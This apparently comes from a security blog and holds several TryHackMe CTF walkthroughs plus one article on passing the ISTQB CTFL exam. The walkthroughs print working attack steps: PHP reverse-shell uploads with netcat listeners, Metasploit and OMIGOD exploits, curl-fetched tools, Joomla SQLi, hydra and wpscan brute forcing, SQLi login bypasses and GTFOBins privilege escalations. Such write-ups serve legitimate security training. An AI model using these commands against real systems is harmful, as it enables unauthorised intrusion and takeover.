2025","externalUrl":null,"permalink":"/writeups/tryhackme/sakura-room-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"SAKURA ROOM -TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner rated room from the TryHackMe platform titled “DAV” DAV- TRY HACK ME- ROOMHello everyone! This is a beginner rated room from the TryHackMe platform titled “DAV”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nHas absolutely no co-relation, but it just flashed in my head when I saw the roomI started by visiting the target IP in a browser and was presented with a default Apache page — a quick sanity-check that HTTP (port 80) was live.\nI then scanned the host and enumerated directories:\nrustscan -a 10.201.10.122 — ulimit 5000gobuster dir -u http://10.201.10.122:80 -w /usr/share/dirb/wordlists/common.txt -t 100gobuster revealed a /webdav path.\nVisiting http://10.201.10.122/webdav prompted for authentication and returned a 401 — clearly WebDAV was present and protected.\nI tried a few things (including a quick SQLi attempt and common default creds) without success.\nThen Searching common known default credentials for WebDAV:\nuser: wampppass: xamppThose credentials authenticated successfully.\nBrowsing the directory revealed a user entry that looked like an Apache APR-encoded password\nwampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91\nThe website also suggested the presence of the cadaver WebDAV client and this would make it a much more streamlined approach:\ncadaver http://10.201.10.122/webdav/Using WebDAV/Cadaver with the authenticated session allowed file upload (PUT), so I uploaded a simple PHP shell\n(PS : always change the IP/port in shells to match your listener lol)\nuploading it :\nput /root/shell.php\nThen I set up a netcat listener:\nnc -lvnp 4433Triggering the uploaded PHP shell via the browser:\nhttp://10.201.10.122/webdav/shell.phpBAM!!, we catch the shell\nNow, navigating through the shell:\ncd /homels -lacd merlinls -lacat user.txtThis gives us the user flag:\n449b40fe93f78a938523b7e4dcd66d2aNext, I immediately try escalating to root privileges:\nsudo -l# (output showed)# (ALL) NOPASSWD: /bin/catNow going to GTFO Bins and seeing it: Because /bin/cat can be run with sudo without a password.\nAll we need to do is use the LFILE and usually the root flag sits in the /root folder\nLFILE=/root/root.txtsudo cat $LFILEThen we get the root flag:\n101101ddc16b0cdf65ba0b8a7af7afa5CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"6 October 2025","externalUrl":null,"permalink":"/writeups/tryhackme/dav-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"DAV- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “All In One” ALL IN ONE -TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “All In One”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nVisiting the victim IP but it’s just a default apache page\nLet’s start with the rustscan:\nrustscan -a 10.201.115.191Open ports are: 21,22,80\nChecking FTP:\nftp 10.201.115.191# then when prompted:# Username: anonymous# Password: anonymousTried scouring through but found nothing so instead exited and ran gobustr scan to see if any hidden directories\ngobuster dir -u http://10.201.115.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100Found /wordpress and /hackathon. These are the next pages that need to be visited\nIn /hackathon the page has the word Vinegar, inspecting the page we see this string :\nDvc W@iyur@123 \u0026amp; KeepGoing\nVigenère hint implies use of a key-based substitution to get a plaintext password.\nSo using an online decoder we get Try H@ckme@123\nNext going to /Wordpress\nIn the homepage I see the user elyana and that gives me a clue that it might be a username and we can use the password\nGo to http://10.201.115.191/wordpress and then /wp-admin.Credentials used\nUsername: elyanaPassword: H@ckme@123Login successful — you gained admin access to the dashboard.Admin access to WordPress allows editing theme files (PHP) — ideal for getting RCE in CTFs.Next starting the rev shell\nPentestMonkey PHP reverse shell:https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.phpDownload/copy the reverse shell script.Edit the script and change IP and Port according to your machine I’ve used port 4444Starting the listener:\nnc -lvnp 4444Now to execute the rev shell in wordpress we navigate to\nAppearance -\u0026gt; Theme Editor\nOpen Theme Functions (style.css)Remove any preexisting code as you noted and paste the full PHP reverse shell (ensure IP and port are set accordingly) and click on update.Next click on Theme Functions functions.php and paste the rev shell again and click on Documentations dropdown → Twenty Script Loader (select the appropriate theme function area) → Click Update.Netcat listener caught the connection — you have a shell.Once in :\npwdcd /homecd elyanacat user.txt# got: Permission deniedcat hint.txt -\u0026gt; says the hint is somewhere on the systemSo I just use the find command to search for the closest related thing elyana\nfind / -type f -user elyana 2\u0026gt;/dev/nullfind / starts at root and searches the filesystem.-type f restricts results to files only.-user elyana finds files owned by user elyana.2\u0026gt;/dev/null hides permission-denied errors to keep output readable.Then I private.txt under private.txt was found in /etc/mysql/conf.d/\nThen:\ncd /etc/mysql/conf.d/ls -lacat private.txtWe get this :\nuser: elyanapassword: E@syR18ghtSo we SSH using these creds:\nssh elyana@10.201.115.191# Password: E@syR18ghtOnce in the shell:\ncat user.txt# Output: VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259Having less braincells as usual lol Going to dcode cipher identifier and I find it’s base 64\nSo heading to base 64 decoder we get the user flag:\nTHM{49jg666alb5e76shrusn49jg666alb5e76shrusn}Now to escalate privileges :\nsudo -lsudo -l lists allowed sudo commands for the current user and whether a password is required.Result: (ALL) NOPASSWD: /usr/bin/socat\nThe minute I see this I know the routine and head to GTFO bin and search up socat and take the sudo exploit line and paste it in\nsudo socat stdin exec:/bin/shConfirming I’m root and going for the root.txt flag\nwhoamicd /rootls -lacat root.txtAnd decoding this as well we get the flag:\nTHM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8}\nCONCLUSION:I hope this write-up walkthrough was helpful to you all!\nThis was scheduled for release on Sunday but has rolled out now due to an unexpected delay. My apologies for the wait\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"1 October 2025","externalUrl":null,"permalink":"/writeups/tryhackme/all-in-one-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"ALL IN ONE -TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Oh My Web server” OH MY WEBSERVER -TRY HACK ME- ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Oh My Web server”\nThis room is classified as medium and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nLaunching rustscan to start on the victim ip\nrustscan -a 10.10.162.192Also loading the web page and it’s a “consult” landing page.\nUsing Wappalyzer I see the Apache version and suspected it looked old\nChecking the Apache version and searching for exploits for Apache 2.4.49 and quickly found RCE modules\npivoting to Metasploit for a executing theexploit\nmsfconsolesearch apache 2.4.49use 0set LHOST tun0 (#It uses your system IP)set ssl false (#disables SSL so the module targets HTTP (port 80) instead of 443)set RPORT 80 (#sets remote port to 80)set RHOST 10.10.162.192runOnce in, we get the shell; uid showed daemon\nStabilizing the shell:\npython3 -c ‘import pty;pty.spawn(“/bin/bash”)’Now checking the contents:\nls — list files (not many interesting things in home).cd /home — saw it was empty, which raised suspicion (typical for containers).ifconfig — network info showed docker-like interfaces → likely running inside a container.Because containers frequently have a host or other containers on an internal bridge network, prepare further enumeration\nNow through linpeas from our machine and pulled it into the exploited shell\nYou can type “peass” to verify if you have linpeasOn your machine (attacker):\ncd /usr/share/peass/linpeaspython3 -m http.serverOn victim (msfconsole shell):\ncd /tmpcurl http://10.9.1.120:8000/linpeas.sh -o linpeas.shlschmod +x linpeas.sh./linpeas.shcd /tmp – good writable location inside the container.curl ... -o linpeas.sh – download the script from your machine.chmod +x – make it executable../linpeas.sh – run local enumerationenvironment is confirmed to be a Docker container.linpeas output included:Files with capabilities (limited to 50): /usr/bin/python3.7 = cap_setuid+ep\nThis is a crucial find: python3.7 has the cap_setuid+ep capability, meaning it can elevate to setuid behavior — a path to local root escalation.\nNow using gtfo bins for sudo exploit:\npython3 -c ‘import os; os.setuid(0); os.system(“/bin/sh”)’python3 -c runs the given Python snippet.import os; os.setuid(0) sets the effective UID to 0 (root) if the binary has the correct capability.os.system(\"/bin/sh\") opens a shell as root.Because /usr/bin/python3.7 had cap_setuid+ep, this trick elevated you to root in the container.Post exploitation:\nidcd /rootls -lacat user.txtwe get the flag:\nTHM{eacffefe1d2aafcc15e70dc2f07f7ac1}Now to escape the container environment to reach the host or other services in the container network. Using a static nmap binary because many containers lack nmap or need static builds.\nOn Attacker machine(your machine):\nstatic-binaries/binaries/linux/x86_64/nmap at master · andrew-d/static-binariesVarious *nix tools built as statically-linked binaries - static-binaries/binaries/linux/x86_64/nmap at master ·…github.com# download static nmap binary (x86_64) from a repo you trust# then serve it:cd ~/Downloadspython -m http.serverOn the container, fetch and run it:\ncurl http://10.9.1.120:8000/nmap -o nmapchmod +x nmapifconfig./nmap 172.17.0.1 -p- — min-rate 5000scan found 5986/tcp open unknown — port 5986 maps to WinRM over HTTPS in Windows environments or to OMIGOD related services in this lab context.\nOn Kali, serve the Omigod PoC:\nhttps://github.com/CyberMonitor/CVE-2021-38648/blob/main/CVE-2021-38647.py\ncd ~/Downloadspython3 -m http.server 8000On the container, download and run the PoC against the internal host IP:\ncurl http://10.9.1.120:8000/CVE-2021-38647.py -o CVE-2021–38647.pypython3 CVE-2021–38647.py -t 172.17.0.1 -c “cat /root/root.txt”What it does: The PoC targets the OMIGOD vulnerability to execute commands on the host (172.17.0.1). The -cargument runs the command and returns output.Result: The PoC prints the host root flag you requested,THM{7f147ef1f36da9ae29529890a1b6011f}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nBeing honest using linpeas.sh and solving this room had me confused and I did take a lot of help from PenguinSecurity and I found it really helpful and this helped me learn something new as well as navigate through this .\nhttps://youtu.be/MUU7LAKOQYs -\u0026gt; This is the link of PenguinSecurity for anyone who prefer it instead of the writeup :)\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"23 September 2025","externalUrl":null,"permalink":"/writeups/tryhackme/oh-my-webserver-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"OH MY WEBSERVER -TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Library” LIBRARY-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Library”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nWe start with visiting the victim IP in a browser and note the theme: a Boot2Root page for BSides Guatemala with some obvious content.\nThe page shows comments section on the page also showed three users: Root, www-data, Anonymous and the post author meliodas — this hints for usernames to try.\nNext I scanned the host to find listening services:\nrustscan -a 10.201.0.32Result: ports 22 and 80 open.\nSince port 80 was open, I ran a directory scan to find obvious files and endpoints.\ngobuster dir -u http://10.201.0.32 -w /usr/share/dirb/wordlists/common.txtResult: found /images and /robots.txt\nOpen /robots.txt and /images in the browser.\n/images contained 4 PNG files/robots.txt (the usual strategy lol) had a curious entry: user agent: rockyouTrying the meliodas username from the landing page, I tried a password list attack over SSH using hydra:\nsudo hydra -l meliodas -P /home/kali/Downloads/rockyou.txt 10.201.0.32 ssh -t 4-l meliodas sets the single username to try.-P /home/kali/Downloads/rockyou.txt points to the password list.10.201.0.32 ssh tells hydra to target SSH on the host.-t 4 increases the parallel thread count for speed.I used rockyou.txt because of the earlier robots hintNext SSHing into the box :\nssh meliodas@10.201.0.32Entering the password\nls -lacat user.txt6d488cbb3f111d135722c33cb635f4ecImmediately checking the permissions set for escalation\nsudo -lFor those wondering why:\nsudo -l lists which commands the current user may run with sudo (and whether a password is required).This can reveal NOPASSWD or restricted commands that we can abuse to get root.Then we get this ouput:\n(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.pyThis means his line means the meliodas user can run /usr/bin/python* /home/meliodas/bak.py as root without being prompted for a password.\nIf we can control /home/meliodas/bak.py (or replace it), we can execute arbitrary code as root.\nAlong with the user.txt we did see the bak.py file, inspecting it:\ncat bak.pyWe see a py code there and also while we did ls -la the permissions show root which means modifications aren’t possible\nInstead we can Use a python exploit and for that let’s remove the file and create a new file with the same name: bak.py with the exploit\nrm bak.py# confirm deletionnano bak.pyThe exploit:\n#!/usr/bin/env pythonimport ptypty.spawn(“/bin/bash”)Using cat to open the newly made bak.py and confirming the exploit presenceAfter saving it, I automatically feel it’s python3 but just to confirm :\nwhich python3This shows: shows the path to the Python 3 binary /usr/bin/python3\nThen running the exploit:\nsudo /usr/bin/python3 /home/meliodas/bak.pyWhat happens is : pty.spawn(\"/bin/bash\") spawns an interactive shell Because the script is run via sudo, the spawned shell is a root shell.\nNow that we are in root, it’s a quick move from here ( as long there are no obstacles in front)\nwhoami (confirms that we root)ls -lacd /root (enter root directory)ls -la (shows all the files and permissions)cat root.txte8c8c6c256c35515d1d344ee0488c617CONCLUSION:I usually post on Sundays but this post has come a bit delayed and I apologize for the delay 🙇\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"15 September 2025","externalUrl":null,"permalink":"/writeups/tryhackme/library-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"LIBRARY-TRY HACK ME-ROOM","type":"writeups"},{"content":" From THM Room Walkthroughs to Testing Fundamentals : How I Passed the ISTQB CTFL v4.0 Exam Debugging the CTFLFrom THM Room Walkthroughs to Testing Fundamentals : How I Passed the ISTQB CTFL v4.0 ExamGuess who’s back, back again? (lol I know no one cares)\nI know no one was waiting on this, but I missed it.I missed writing walkthroughs. I missed breaking things down.I missed putting something out there that might help someone, even just one person, make sense of something new.\nSo yeah — I’m back.Not with a usual walkthrough.Instead this one time, it’s the one and only:\nISTQB Certified Tester Foundation Level v4.0Why This? Why Now?Recently, I faced a situation that pulled me into the world of Security testing in a real-world context with an organisation — and it forced me to confront how little I knew about the software testing domain. Sure, I knew a couple of things. But when it came to understanding how systems are tested from a process and quality perspective and understanding terms and processes, I had gaps.\nThat’s when I came across the ISTQB Certified Tester Foundation Level (CTFL) exam — a globally recognized cert that teaches the fundamentals of testing:\nFundamental terminologies of Testing ConceptsHow testing fits into the SDLCBlack-box and white-box techniquesRisk-based testingAgile approachesTest case designDefect life cycles and moreWhether or not this cert is required depends on your role.\nBut for me — transitioning, pivoting, and trying to upskill in a new direction — it felt like the right move. It gave me a structured way to build some understanding from scratch.\nQuick DisclaimerBefore we go further — let’s clear the air.\nThe ISTQB CTFL is one of those certs that people have strong opinions about. Some think it’s essential for breaking into QA or testing roles. Others think it’s too academic, outdated, or unnecessary in real-world scenarios.\nHere’s the thing: I’m not here to debate its worth.\nDepending on the company, the role, or the country — this cert might be a checkbox requirement, a nice-to-have, or totally irrelevant.\nWhether you choose to take it or not is up to you.\nNo gatekeeping here. Just sharing my experience — please do take what’s useful, leave what’s not :)\nWhat Even Is the CTFL?For those who know well and good but for those who are new and unfamiliar:\nIt’s an entry-level certification for software testing that covers the core principles, techniques, and processes used in structured testing environments.\nThe v4.0 version is the most recent syllabus, updated to reflect more modern practices — including Agile, continuous delivery, and risk-based testing. It’s no longer stuck in the waterfall-only world.\nWhat It CoversThe CTFL exam is designed to test your understanding of:\nThe software test process — from planning to reportingTesting throughout the software development life cycle (SDLC)Static testing — like reviews and walkthroughsTest techniques — black-box, white-box, and experience-basedTest management — roles, responsibilities, metricsAgile testing fundamentalsTools that support testingNothing super advanced — but a lot of terminology, theory, and framework thinking.\nExam Format40 multiple-choice questions60 minutes totalClosed book65% to pass (26/40)Taken online (proctored) or at a test centerBased directly on the syllabusHow I PreparedI gave myself around 2–3 weeks of casual but focused prep.\nHere’s the approach that worked for me:\n1. Start with the SyllabusThe official ISTQB CTFL v4.0 syllabus is the bible for this exam. It maps out every learning objective, topic, and what you need to know.\nFirst pass: skim to get the big picture.Second pass: deep dive, making notes and highlighting key points.\n2. Practice Tests — Your Best FriendI grabbed unofficial mock tests from various corners of the internet and did them early and often. These helped me:\nGet used to the question style — which is subtle, sometimes trickyPinpoint weak spots (like test module 4) {It really had me suffering at a point haha}Build confidence with the terminologyI would say practice tests played a crucial role in my improvement. They helped me a lot, and with each test, my understanding deepened. This gradually helped me grasp concepts better, which naturally led to my scores improving.Resources used in specific:\nhttps://www.udemy.com/course/istqb-foundation-level-practice-exams/https://www.udemy.com/course/istqb-foundation-level-syllabus-sample-exams/https://www.udemy.com/course/certified-tester-foundation-level-ctfl/https://www.linkedin.com/posts/bhavin-thumar_istqb-foundation-cheat-sheet-activity-7202489038933524480-Zo_M3. Use Videos or GPT for Concept ClarityWhen I hit concepts that felt dry or confusing — like the difference between verification and validation — I watched short explainer videos on YouTube.\nAnother tip is to run it through GPT and that really worked in understanding specific concepts and asking it to tweak it and return questions to understand it better.\n4. Memorize the GlossaryI ignored this at first and paid for it later. The ISTQB Glossary is your friend. Many questions hinge on precise definitions — like error vs defect vs failure.\nBooking the examBefore you register, it’s important to understand that ISTQB works through a network of Member Boards, and choosing the right one matters.\nE.g., ASTQB (USA), BCS (UK), ISQI (European), Indian Testing Board (ITB), ANZTB (Australia/New Zealand)They cater primarily to local candidates but allow international bookings in many cases.\nSome organizations allow either test center based exam or remote proctored\nThere are various options of exams in our case it’s ISTQB CTFL v4.0\nAll ISTQB certifications are globally valid and recognized.\nHowever, your certificate will carry the name of the issuing board or provider, which might influence:\nExam language availabilitySupport and rebooking policiesTraining partnerships and discountsFinal ThoughtsTaking the ISTQB CTFL wasn’t about chasing a fancy credential — it was about closing gaps, building a foundation in a field I was sliding into, and getting comfortable with concepts I’d overlooked.\nNo, it won’t suddenly make you a senior QA engineer and of course , it won’t replace hands-on experience.\nBut it will give you structure, vocabulary, and a solid base to build from — whether you’re moving into QA, Testing or just trying to understand software quality and testing world better.\nSo if you’re like me — in transition, curious, or trying to connect the dots — the CTFL might just be worth your time.\nAnd at the very least, you’ll walk away knowing the difference between a defect, a failure, and an error or the common questions whether testing and QA are the same haha — which is more than most.\n","date":"7 September 2025","externalUrl":null,"permalink":"/articles/certifications/debugging-the-ctfl/","section":"Security Research \u0026 Articles","summary":"","title":"Debugging the CTFL","type":"articles"},{"content":" Hello everyone! This room gave off immediate nostalgic vibes, but we’re here for exploits — although, fun bonus if you’re a Spidey fan thi… DAILY BUGLE-TRY HACK ME-ROOMHello everyone! This room gave off immediate nostalgic vibes, but we’re here for exploits — although, fun bonus if you’re a Spidey fan thi room is from the TryHackMe platform titled “Daily Bugle”\nThis room is classified as hard challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nIf you know you knowWe start by visiting the target IP in the browser:\nhttp://10.10.187.73We’re greeted by a Daily Bugle themed website showing Spider-Man robbing a bank. Classic misdirection.\nThere’s a login page, and from the look of the design and page structure, I quickly check the souce and scan and notice Joomla CMS is involved here.\nTo enumerate the open services, we go ahead with port scans\nrustscan -a 10.10.187.73We discover the following open ports:\n22 (SSH)80 (HTTP)3306 (MySQL — MariaDB)To confirm the CMS and version, we hit a classic Joomla fingerprinting route:\nhttp://10.10.187.73/administrator/manifests/files/joomla.xmlThis reveals-\n\u0026lt;version\u0026gt;3.7.0\u0026lt;/version\u0026gt;And exploring online Joomla 3.7.0 is a known vulnerable version\nI search for a known exploit and find this GitHub repo:\nGitHub - stefanlucas/Exploit-Joomla: CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla…CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0 - GitHub - stefanlucas/Exploit-Joomla…github.comWe download and run the script using wget:\nwget https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/refs/heads/master/joomblah.pyNext,\npython3 joomblah.py http://10.10.187.73The script dumps database details, and in particular:\nTable: fb9j5_usersUser: jonahHash: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutmWe now have:\nUsername: jonahEmail: jonah@tryhackme.comPassword Hash: (bcrypt format because of the format $2y$ in the start)Now we need to crack the hash:\nCreate a file to store the hash:\nnano joomhashPaste the hash into it. Then run John:\njohn — wordlist=/home/kali/Downloads/rockyou.txt joomhashJohn cracks it pretty quickly\nspiderman123A lot of similarity to my style of working lolNow that we have cracked the hash we need to use the creds and login:\nhttp://10.10.187.73/administrator/\nUse the credentials:\nUsername: jonahPassword: spiderman123Boom! And we’re in\nNow after reading up a bit I found out where can we go to execute our reverse shell\nWe move to the Template Editor:\nExtensions ➝ Templates ➝ Protostar ➝ index.phpReplace the code with a PHP reverse shell (make sure to configure your IP and port), then start your listener:\nnc -lvnp 4444Then trigger the shell in the browser:\nhttp://10.10.187.73/index.phpAnd boom — shell caught! Stabilize the shell (if needed):\npython3 -c ‘import pty; pty.spawn(“/bin/bash”)’Now escalating privelege\nTrying to access the jjameson home directory:\ncd /home/jjamesoncat user.txtPermission denied\nTo search for some credentials and get a lead we explore default document root for web servers:\ncd /var/www/htmlcat configuration.phpconfiguration.php is a common filename for PHP applications to store their configuration settings\nand from this we get:\n$password = ‘nv5uz9r3ZEDzVjNu’Now using this let’s try to switch the user access:\nsu jjamesonPassword: nv5uz9r3ZEDzVjNuand this works, next let’s get the details from the user.txt\ncat user.txtand we get the user flag:\n27a260fe3cba712cfdedb1c86d80442eNow escalating privilege to Root\nCheck for sudo permissions:\nsudo -lOutput shows:\n(ALL) NOPASSWD: /usr/bin/yumImmediately when I see this I head to GTFO BINS, looking at the GTFOBins yum entry, we can escalate\nand then drop it :\nsudo yum -y install yumTF=$(mktemp -d)echo ‘id’ \u0026gt; $TF/x.shchmod +x $TF/x.shsudo yum -y localinstall $TF/x.shOnce in the root:\ncd /rootcat root.txtWe then get root flag as well:\neec3d53292b1821868266858d7fa6f79CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\nPS: I’ll be taking a short hiatus as I prepare for a certification exam. I’ll be back very shortly with more content — but until then, feel free to go through any of my walkthroughs, and don’t hesitate to drop comments if you’re stuck or have doubts. I’ll still be around to reply and help you out!\n","date":"1 August 2025","externalUrl":null,"permalink":"/writeups/tryhackme/daily-bugle-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"DAILY BUGLE-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “COLDDBOX” COLDDBOX-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “COLDDBOX”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\n100% worth the rewatch after completing this roomI start by visiting the website we see a simple website made by Coldd and we see it’s made by Wordpress\nI even start nmap:\nnmap 10.10.83.227This scans the target for open ports and service versions.Knowing it’s a wordpress we go to /wp-login.php\nNow using wpscan\nwpscan — url http://10.10.83.227/ — enumerate u--url: Specifies the WordPress site URL.--enumerate u: Attempts to enumerate valid WordPress usernames.Output: reveals 3 users — hugo, c0ldd, and Philip.Now we know c0ldd is the person who made the website so using his username let's bruteforce trying to find the password.\nwpscan — url http://10.10.83.227/ — usernames c0ldd — passwords /home/kali/Downloads/rockyou.txtThis uses rockyou.txt to brute-force the password for c0lddEventually, we get the password: 9876543210\nUsing this credentials we login and see the dashboardAs per usual I feel it has to be the revshell again-Going to Appearance and then Theme Editor, we paste the reverse shell code.-Then modify the IP and port appropriately-I select 404 template, then click Update File\nThen opening the listner :\nnc -lvnp 1234now based on our page we make the changes:\nhttp://10.10.83.227/wp-content/themes/twentyfifteen/404.phpReverse shell connects back\npython3 -c ‘import pty; pty.spawn(“/bin/bash”)’Now this upgrades to a fully interactive pseudo-terminal\nThen going to /home -\u0026gt; /c0ldd and trying t read the user.txt, but it shows permission denied\nSo we try SUID binary enumeration\nfind / \\-perm -4000 2\u0026gt;/dev/nullSearches for all files with SUID bit set (4000 permission).2\u0026gt;/dev/null: suppresses permission errors.This command quickly scans the entire filesystem for such binaries that can potentially be leveraged to escalate to rootfrom a limited shell./usr/bin/findThis catches our eye\nGoing to GTFOBins:\nhttps://gtfobins.github.io/gtfobins/find/find . -exec /bin/sh \\; -quit-exec: executes a command for each matching file./bin/sh -p: runs a shell with preserved privileges.-quit: exits after one match to avoid repeating.This drops us into a root shell\nNow capturing the flags\ncd /home/c0lddcat user.txtThis gives the user.txt\nRmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==cd /rootls -lacat root.txtThis leads us to the final flag a.k.a the root flag\nwqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"27 July 2025","externalUrl":null,"permalink":"/writeups/tryhackme/colddbox-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"COLDDBOX-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Lesson Learned” LESSON LEARNED-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Lesson Learned”\nThis room is classified as easy and what seems like a standard challenge needs a little more subtlety. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nI navigated to the victim’s IP in the browser. It presented a simple login form classic setup. I reached straight for my usual SQLi bypass payload\nUnfortunately, this immediately returned an error. The page responded with something indicating SQL injection was detected.\nSo clearly, this application had basic detection in place to block destructive or obvious payloads.\nAt this point, the box was considered broken due to failed attempts — I terminated the instance and spun up a fresh one.\nI turned to SQLi variants that were less obvious. Pulled from notes and public payload libraries, I started experimenting with:\nORDER BY 1--GROUP BY null--' UNION SELECT NULL--' OR 'A'='A'--But even when sending these through Burp Suite, none of them worked.\nEither nothing changed on the page or the error messages gave me no useful feedback. It was clear brute-forcing blindly wasn’t going to work.\nTime for a change of strategy. The application only gave “Invalid username or password”. That made me think: what if it behaved differently for a correct username?\nSo I decided to do a username enumeration attack by watching for subtle changes in the response.\nLoaded Burp Suite and intercepted a login request.Created an intruder attack, placing the payload position on the username field.Set up my wordlist using:/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt\nFor the password, I kept it as “test” just to get response behavior.\nAfter running the attack, I filtered responses based on length and noticed that for username: martin, the message changed to “Invalid password” instead of the usual generic error.\nThat was my signal! Valid username found: martin\nNow that I had the correct username, I could apply a simple SQLi true clause using the comment operator:\nUsername: martin’ #' closes the username string.# comments out the rest of the query.Effectively, this disables password validation if the username exists.This input effectively terminated the SQL query and bypassed password validation.\nBoom. 🎯 It presented the final flag on the landing page.\nTHM{aab02c6b76bb752456a54c80c2d6fb1e}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me 